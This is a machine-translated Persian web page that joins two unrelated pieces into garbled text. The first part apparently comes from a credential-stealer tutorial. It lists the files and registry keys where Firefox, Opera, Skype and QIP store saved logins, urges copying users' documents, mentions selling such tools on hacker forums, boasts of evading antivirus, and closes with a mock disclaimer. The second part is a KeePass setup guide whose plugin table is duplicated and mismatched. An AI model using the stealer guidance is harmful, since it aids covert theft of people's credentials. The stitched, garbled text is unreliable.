امروز، مرورگر فقط یک برنامه برای سفر وب نیست، بلکه یک کل ترکیب است که علاوه بر فرصت های گوناگون، اطلاعات محرمانه زیادی را حفظ می کند. یک مثال معمولی یک فرم وب است. 99٪ از سایت های مدرن نیاز به ثبت نام دارند. به یاد داشته باشید و به طور مداوم در سر خود را وارد کنید ورود / رمز عبور برای هر سایت - وظیفه غیر واقعی است، به خصوص اگر شما یک کاربر پیشرفته و گشت و گذار از اینترنت شما محدود به یک "همکلاسی" و "vkontakte" نیست.
توسعه دهندگان زندگی کاربران را تسهیل کردند و به اصطلاح "مخازن رمز عبور" را در برنامه ها تعبیه کردند. من ثبت نام کردم، من تحت حساب من رفتم، به مرورگر دستور داد که اعتبار را به یاد داشته باشید و فراموش کرده ام. دفعه بعد که شما فقط چند کلیک را با ماوس انجام دادید، و شما در حال حاضر در سایت هستید. از آنجا که مرورگر گذرواژه را حفظ می کند، به این معنی است که ما این فرصت را داریم که تمام پایگاه خود را بکشیم.
همه این فایل ها در سند و تنظیمات در حال حاضر آشنا هستند \\٪ نام کاربری٪٪ / داده های برنامه \\ mozilla \\ فایرفاکس / پروفایل ها٪ مشخصات مشخصات٪.
اپرا
اپرا - مرورگر، که در میان کاربران روسی بسیار محبوب است. به طور طبیعی، ما نمی توانیم بدون توجه به آن را ترک کنیم. بنابراین، با اپرا وضعیت تقریبا مشابه با فایرفاکس است. تمام رمزهای عبور ذخیره شده در مرورگر در سند و تنظیمات \\٪ USERNAME٪ \\ PROFERSTION \\ opera \\ مشخصات در فایل wand.dat ذخیره می شود. به نظر می رسد، زمانی که اپرا شناسایی می شود، ما عمل خواهیم کرد و همچنین در مورد فایرفاکس.
اسکایپ
محبوبیت اسکایپ هر روز رشد می کند. بسیاری از آن ها به عنوان وسیله ای برای برقراری تماس استفاده نمی شود، بلکه برای یک چت مناسب مناسب است. تمام داده های صمیمی، همانطور که انتظار می رفت، در نمایه کاربر (وجود دارد، جایی که اپرا یا FF خود را ذخیره می کنند) واقع شده اند. برای "خصوصی سازی" خود باید کپی پروفایل کاربر را از سند و تنظیمات \\٪ نام کاربری٪٪ / داده های برنامه \\ skype \\ و صادرات شعبه رجیستری - HKEY_Current_USER \\ Software \\ Skype \\ ProtectedTorage.
چیپ
مانند بسیاری از برنامه های قبلا شرح داده شده، Qip تمام فروشگاه های رمز عبور ذخیره شده در اطلاعات برنامه \\ QIP.
کپی کردن تکمیل شده
فناوری .NET به شدت به ما این کار را ساده کرده است، به عنوان یک نتیجه از کل کدگذاری به یک روش به چند روش تقسیم شد. البته، شما می توانید بگویید که این خنک نیست و چنین چیزهایی برای نوشتن در WinAPI یا ASM کارآمدتر است. در چیزی، من با شما موافقم، اما با توجه به Winapi و علاوه بر این، در مورد ASME برای نوشتن چنین برنامه ای به طوری که قادر به سرعت به سرعت نیست. در حالی که دیگران کد کیلومتر را بنویسند، ما برداشت را جمع آوری خواهیم کرد. موفق باشید در برنامه نویسی، و اگر سوالی دارید، از شما می خواهم، بر روی صابون بنویسید.
فراموش نکنید، بسیاری از کاربران اطلاعات محرمانه را در پوشه اسناد من ذخیره می کنند. حداقل، ممکن است اسناد کار جالب و گاهی اوقات کل فایل ها با کلمه عبور وجود داشته باشد. من در زمان من (در کار سابق) من یک فایل فرمت شده منظم را با رمزهای عبور به مشتریان در یک محفظه کشف کردم.
به عنوان یک دوست واقعی، شما باید به همه این افراد کمک کنید با پشتیبان گیری از اطلاعات محرمانه خود.
در بسیاری از انجمن های هکر، بسیاری از تبلیغات برای فروش نرم افزار این نوع. قیمت های مختلف - از 10 دلار به 100 دلار. بهبود نمونه های مورد نظر در مقاله، شما می توانید بر روی پوسته نان سیاه و سفید با خاویار کسب کنید. من تکرار می کنم، مهمترین چیز این است که به صورت خلاقانه به پرونده بروم، و همه چیز قطعا کار خواهد کرد. باز هم، آنتی ویروس ها شناسایی نمی شوند؛).
هشدار
ما از این برنامه به طور انحصاری برای پشتیبان گیری به موقع محتویات فلش درایو دیسک و پشتیبان گیری در فلش درایو USB استفاده می کنیم. و چی فکر کردی؟ استفاده غیرقانونی از چنین نرم افزاری مجازات است!
بسیاری از شرکت ها، از جمله سونی و ادوبی، قبلا قربانی هکرها شده اند که میلیون ها کلمه عبور و سایر داده های کاربر را به سرقت رفته اند. تجزیه و تحلیل این اطلاعات نشان داد که بسیاری از کاربران اغلب از کلمه عبور غیر قابل اعتماد مانند "123456" یا همان رمز عبور برای بسیاری از خدمات استفاده می کنند. این بسیار هکرها از کار خود را تسهیل می کند، و در عین حال چنین بی دقتی را می توان درک کرد: چه کسی قادر به یادآوری بیش از دوازده کلمه عبور دشوار است؟
یک راه حل ساده می تواند یک قطعه کاغذی تحت صفحه کلید باشد. هیچ هکر نمی تواند به او بخورد، اما شما باید به طور مداوم مانیتور مردم در نزدیکی کامپیوتر خود را. و از این ورق هیچ کاربردی وجود ندارد اگر می خواهید حساب خود را با کامپیوتر شخص دیگری وارد کنید.
Keepass 2 قابل حمل ابزار قابل حمل این معضل را حل می کند. برای کار خود، فقط یک درایو USB فلش با 10 مگابایت فضای آزاد که برنامه ای کمکی را نصب می کنید، نیاز دارید. در آینده، شما باید فقط یک رمز عبور را به یاد داشته باشید - از منطقه حفاظت شده فلش درایو. پس از همه، اطلاعات Keepass را نگه می دارد تا خدمات وب خود را به صورت یک بانک داده کد شده محافظت شده توسط رمز عبور اصلی وارد کنید.
Troyans، گرفتن کلمه عبور، قادر به بلند کردن هر چیزی نیست. و از آنجایی که شما دیگر نیازی به حفظ حافظه ده ها کلمه عبور ندارید، می توانید از یک سرویس جدید برای هر سرویس وب استفاده کنید، رمز عبور واقعا قابل اعتماد. در حال حاضر ما به شما جزئیات می دهیم که چگونه از KeePass استفاده کنید.
چگونه انجامش بدهیم
1 رمز عبور امن را نصب کنید
رمز عبور امن را نصب کنید
درایو USB فلش را در کامپیوتر وارد کنید، یک پوشه جدید را بر روی آن ایجاد کنید و محتویات آرشیو را با نرم افزار Keepass کپی کنید. برنامه Keepass.exe را اجرا کنید. پس از شروع، جستجو خودکار برای به روز رسانی را با کلیک کردن در پنجره پاپ آپ به "فعال" فعال کنید. سپس "View | تغییر زبان و کلیک کنید "دریافت زبان های بیشتر".
فایل زبان روسی را از محل باز کردن با کلیک روی «روسی | 2.25+. " محتویات بایگانی را به درایو USB باز کنید. دوباره روی "View | تغییر زبان، "انتخاب" روسی "و راه اندازی مجدد Keepass با فشار دادن دکمه" بله ".
2 یک پایگاه داده رمز عبور جدید ایجاد کنید
یک پایگاه داده رمز عبور جدید ایجاد کنید
انتخاب "فایل | جدید "و یک درایو USB را به عنوان ذخیره سازی رمز عبور مشخص کنید. در پنجره بعدی، این برنامه از شما خواسته است تا رمز عبور اصلی را تنظیم کنید. لازم است که هر زمان شروع شود، باید وارد شود.
3 حالت محافظت شده را فعال کنید
حالت محافظت شده را فعال کنید
به تروجان نمی تواند رمز عبور خود را برای KeeBass حساب کند، شما باید از حالت برنامه محافظت شده، شبیه به UAC در ویندوز 7 استفاده کنید. برای انجام این کار، به Keepass به "سرویس | تنظیمات | امنیت "، در پایین پنجره حرکت کنید و جعبه را کنار بگذارید" رمز عبور اصلی را در حالت امن "وارد کنید.
4 گذرواژه پایگاه داده را پر کنید
گذرواژه پایگاه داده را پر کنید
KeePass می تواند کلمات عبور را بر اساس گروه ها مرتب کند. به طور پیش فرض، شما گروه هایی را به عنوان "سیستم عامل" یا "اینترنت" در رمز عبور بانک جدید خود دارید. برای ایجاد یک ورودی جدید، گروه مناسب را انتخاب کنید (یا یک جدید ایجاد کنید)، روی منطقه سفید به سمت راست با دکمه راست ماوس کلیک کنید و سپس با "اضافه کردن رکورد".
تمام فیلدها را پر کنید و روی OK کلیک کنید. از آنجا که دیگر نیازی به یادآوری کلمه عبور برای ورود به هر حساب ندارید، می توانید مجتمع جدیدی را تنظیم کنید، که می تواند به عنوان مثال در وب سایت PassWort-Generator.com تولید شود.
5 از مجوز خودکار استفاده کنید
اگر می خواهید با KeePass وارد شوید، گروهی را که در آن رمز عبور مناسب ذخیره می شود، باز کنید. راست کلیک بر روی ورودی مناسب به ذخیره سازی رمز عبور KeePass کلیک کنید و "شروع به اتمام کردن" را در لیست انتخاب کنید. پس از آن، برنامه داده های مرورگر شما را انتقال می دهد، و مرورگر یک پنجره جدید را باز می کند که در آن شما حساب خود را وارد کنید.
لطفا توجه داشته باشید که در فیلد "URL"، باید URL را وارد کنید که معمولا در مرورگر برای مجوز وارد می شوید، در غیر این صورت شما کار نمی کنید به صورت خودکار رمز عبور را از طریق Keepass وارد کنید.
6 قابلیت های نگهدارنده را گسترش دهید
قابلیت های نگهدارنده را گسترش دهید
اگر می خواهید قابلیت های Keepass را گسترش دهید، به "سرویس | ماژول ها | ماژول های بیشتر "، پس از آن شما به سایت با پسوندهای مفید هدایت می شوید (توصیه های ما را می توان در جدول بالا یافت). حالا روی افزونه نام کلیک کنید، آن را دانلود کنید و آن را در درایو فلش باز کنید.
دوباره Keepass را اجرا کنید و به "سرویس | ماژول ها در پایین، لیستی از پلاگین های موجود ظاهر می شود (برخی از آنها را می توان پیکربندی کرد).
بهترین افزونه ها برای Keepass
فرض کنید Sapper خود را با گذرواژهها با ویژگی های اضافی مانند عملکرد پشتیبان یا انتقال رمز عبور برای تلفن های همراه.
نام |
شرح |
| پایگاه داده | حفاظت از بانک های رمز عبور را در صورتی که درایو USB به سرقت رفته یا از دست رفته تنظیم شود، تنظیم می کند. |
| رمزنگاری Twofish | |
| keeagent | یک الگوریتم کدگذاری را اضافه می کند که تقریبا غیرممکن است. توجه داشته باشید که به این دلیل، Keepass کار کندتر خواهد شد. |
| keyexchanger | یک الگوریتم کدگذاری را اضافه می کند که تقریبا غیرممکن است. توجه داشته باشید که به این دلیل، Keepass کار کندتر خواهد شد. |
| بر امده | سایت های مورد علاقه خود را با فشار دادن دکمه باز می کنید و به طور خودکار اطلاعات ثبت نام خود را می سازد. |